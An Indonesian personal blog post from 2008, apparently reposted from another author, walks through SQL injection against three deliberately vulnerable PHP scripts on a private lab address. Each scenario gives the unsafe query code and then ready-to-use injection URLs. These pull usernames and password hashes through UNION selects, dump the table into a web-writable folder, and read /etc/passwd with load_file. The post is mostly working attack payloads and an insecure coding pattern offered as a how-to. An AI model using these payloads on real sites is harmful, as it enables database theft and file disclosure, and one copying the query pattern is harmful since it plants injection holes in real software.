Andi Live Is Here

My Live Is My Future

  • Meta

    • « Cinta Itu Seperti Menunggu Bis Saja
    Link Download Naruto Shippuuden »

    Php Injection In Action

    May 21st, 2008 by Admin

    -== WEB HACKING IN ACTION PART I==-

    PHP - MYSQL : SQL INJECTION
    —————————-

    (Dumping MySQL Database)

    CREATE TABLE `userlist` (
    `id` tinyint(6) NOT NULL auto_increment,
    `username` varchar(28) NOT NULL,
    `status` varchar(28) NOT NULL,
    `password` varchar(48) NOT NULL,
    `creation_date` timestamp NOT NULL default CURRENT_TIMESTAMP on update CURRENT_TIMESTAMP,
    `nama_lengkap` varchar(128) NOT NULL,
    `status_id` tinyint(6) NOT NULL,
    PRIMARY KEY (`id`)
    ) ENGINE=MyISAM DEFAULT CHARSET=latin1 AUTO_INCREMENT=7 ;


    – Dumping data for table `userlist`

    INSERT INTO `userlist` (`id`, `username`, `status`, `password`, `creation_date`, `nama_lengkap`, `status_id`) VALUES
    (1, ‘anxx’, ‘administrator’, ‘8a1465884c097cfa30e332c57exxxxxx’, ‘2007-05-15 21:18:08′, ‘anxxx nightlogin’, 1),
    (2, ‘kaxxxx’, ‘operator’, ‘8a1465884c097cfa30e332c57xxxxxx’, ‘2007-05-04 21:18:31′, ‘kaxxxx poseidon’, 2),
    (3, ‘bxxx’, ‘operator’, ‘b3f85374ebbdb228c0ad76cd6axxxxxx’, ‘2007-05-04 16:51:32′, ‘Bxxx Erlangga’, 2),
    (4, ‘haxxx’, ‘operator’, ‘daa526517139536f056efbb8exxxxxx’, ‘2007-05-04 20:13:31′, ‘Haxxx pekok’, 2);

    #############
    # SEKENARIO 1
    #############

    <?php
    $host=”localhost”;
    $user=”xx”;
    $passwd=”xxx”;
    $dbname=”e-register”;
    if(!isset($_GET['id']) OR empty($_GET['id']))
    {
    die(”Error ndan!!”);
    }

    $dbid=$_GET['id'];
    $conid=mysql_connect($host,$user,$passwd) or die(mysql_error());
    mysql_select_db($dbname,$conid) or die(mysql_error());
    $query=”SELECT * FROM userlist WHERE id=’$dbid’”;
    $res=mysql_query($query) or die(mysql_error());
    $row=mysql_fetch_object($res);
    if(!$row){
    die(mysql_error());
    }
    echo “Nama : “.$row->nama_lengkap.”<br>”;
    echo “Username : “.$row->username.”<br>”;
    echo “Status :”.$row->status.”<br>”;
    echo “\n”;

    ?>

    Eksploitasi:

    http://172.16.11.xx/~kaiten/PENTEST/sqlvuln.php?id=2′ and ‘a’='a
    http://172.16.11.xx/~kaiten/PENTEST/sqlvuln.php?id=2′ union select 1,1,1,1,1,1,1/*
    http://172.16.11.xx/~kaiten/PENTEST/sqlvuln.php?id=-1′%20union%20select%201,username,concat(char(112,97,115,115,119,111,114,100,58),password),1,1,1,1%20from%20userlist%20where%20id=1/*
    http://172.16.11.xx/~kaiten/PENTEST/sqlvuln.php?id=2′%20union%20select%20*%20from%20userlist%20into%20outfile%20′/var/www/users/kaiten/PENTEST/db.txt
    http://172.16.11.xx/~kaiten/PENTEST/sqlvuln.php?id=1′%20union%20select%201,1,1,1,1,1,load_file(’/etc/passwd’)%20into%20outfile%20′/var/www/users/kaiten/PENTEST/pwdx.txt’/*

    #############
    # SEKENARIO 2
    #############

    <?php
    $host=”localhost”;
    $user=”xx”;
    $passwd=”xxx”;
    $dbname=”e-register”;
    if(!isset($_GET['id']) OR empty($_GET['id']))
    {
    die(”Error ndan!!”);
    }

    $dbid=$_GET['id'];
    $conid=mysql_connect($host,$user,$passwd) or die(mysql_error());
    mysql_select_db($dbname,$conid) or die(mysql_error());
    $query=”SELECT * FROM userlist WHERE id=$dbid”;
    $res=mysql_query($query) or die(mysql_error());
    $row=mysql_fetch_object($res);
    if(!$row){
    die(mysql_error());
    }
    echo “Nama : “.$row->nama_lengkap.”<br>”;
    echo “Username : “.$row->username.”<br>”;
    echo “Status :”.$row->status.”<br>”;
    echo “\n”;
    ?>

    Eksploitasi:

    http://172.16.11.xx/~kaiten/PENTEST/sqlvuln.php?id=2 and 1=0
    http://172.16.11.xx/~kaiten/PENTEST/sqlvuln.php?id=2 union select 1,1,1,1,1,1,1
    http://172.16.11.xx/~kaiten/PENTEST/sqlvuln2.php?id=-1%20union%20select%201,username,concat(char(112,97,115,115,119,111,114,100,58),password),1,1,1,1%20from%20userlist%20where%20id=1
    http://172.16.11.xx/~kaiten/PENTEST/sqlvuln.php?id=2%20union%20select%20*%20from%20userlist%20into%20outfile%20′/var/www/users/kaiten/PENTEST/db.txt’
    http://172.16.11.xx/~kaiten/PENTEST/sqlvuln2.php?id=1%20union%20select%201,1,1,1,1,1,load_file(’/etc/passwd’)%20into%20outfile%20′/var/www/users/kaiten/PENTEST/pwd.txt’

    #############
    # SEKENARIO 3
    #############

    <?php
    $host=”localhost”;
    $user=”xx”;
    $passwd=”xxx”;
    $dbname=”e-register”;
    if(!isset($_GET['id']) OR empty($_GET['id']))
    {
    die(”Error ndan!!”);
    }

    $dbid=$_GET['id'];
    $conid=mysql_connect($host,$user,$passwd) or die(mysql_error());
    mysql_select_db($dbname,$conid) or die(mysql_error());
    $query=”SELECT * FROM userlist WHERE (id=’$dbid’)”;
    $res=mysql_query($query) or die(mysql_error());
    $row=mysql_fetch_object($res);
    if(!$row){
    die(mysql_error());
    }
    echo “Nama : “.$row->nama_lengkap.”<br>”;
    echo “Username : “.$row->username.”<br>”;
    echo “Status :”.$row->status.”<br>”;
    echo “\n”;

    ?>

    Eksploitasi:

    http://172.16.11.xx/~kaiten/PENTEST/sqlvuln3.php?id=1′)%20and%201=1/*
    http://172.16.11.xx/~kaiten/PENTEST/sqlvuln.php?id=2′) union select 1,1,1,1,1,1,1/*
    http://172.16.11.xx/~kaiten/PENTEST/sqlvuln3.php?id=-1′)%20union%20select%201,username,concat(char(112,97,115,115,119,111,114,100,58),password),1,1,1,1%20from%20userlist%20where%20id=2/*
    http://172.16.11.xx/~kaiten/PENTEST/sqlvuln.php?id=2′)%20union%20select%20*%20from%20userlist%20into%20outfile%20′/var/www/users/kaiten/PENTEST/db.txt’/*

    Note :
    /var/www/users/kaiten/PENTEST/ is world writeable (permission 777)
    magic_quotes_gpc = Off
    I’a really lamme in SQL injection :((
    Author : Ph03n1X
    URL : http://kandangjamur.net

    NB From Me :

    Kalo ada kesalahan dalam artikel yang ini, coba buka yg di bawah ini :D

    http://andi.lp3i.net/tools/sql-inject.txt

    This entry was posted on Wednesday, May 21st, 2008 at 12:56 am and is filed under Hacking. You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site.

    3 Responses to “Php Injection In Action”

    Rony setiawan Says:

    May 24th, 2008 at 4:33 am

    mantap.. mantap…
    buat andi lam kenal yach dari lp3i bekasi….

    peace yoo

    Php Injection In Action | MySQL Security Says:

    May 28th, 2008 at 8:07 am

    [...] the original: Php Injection In Action command securitycommand securityRelated Posts [...]

    mysql select insert Says:

    June 5th, 2008 at 3:59 am

    [...] [...]

    Leave a Reply

    Wood | Design: NET-TEC SEO of Energieausweis. Coding: Ratenkredit of elegante Abendkleider.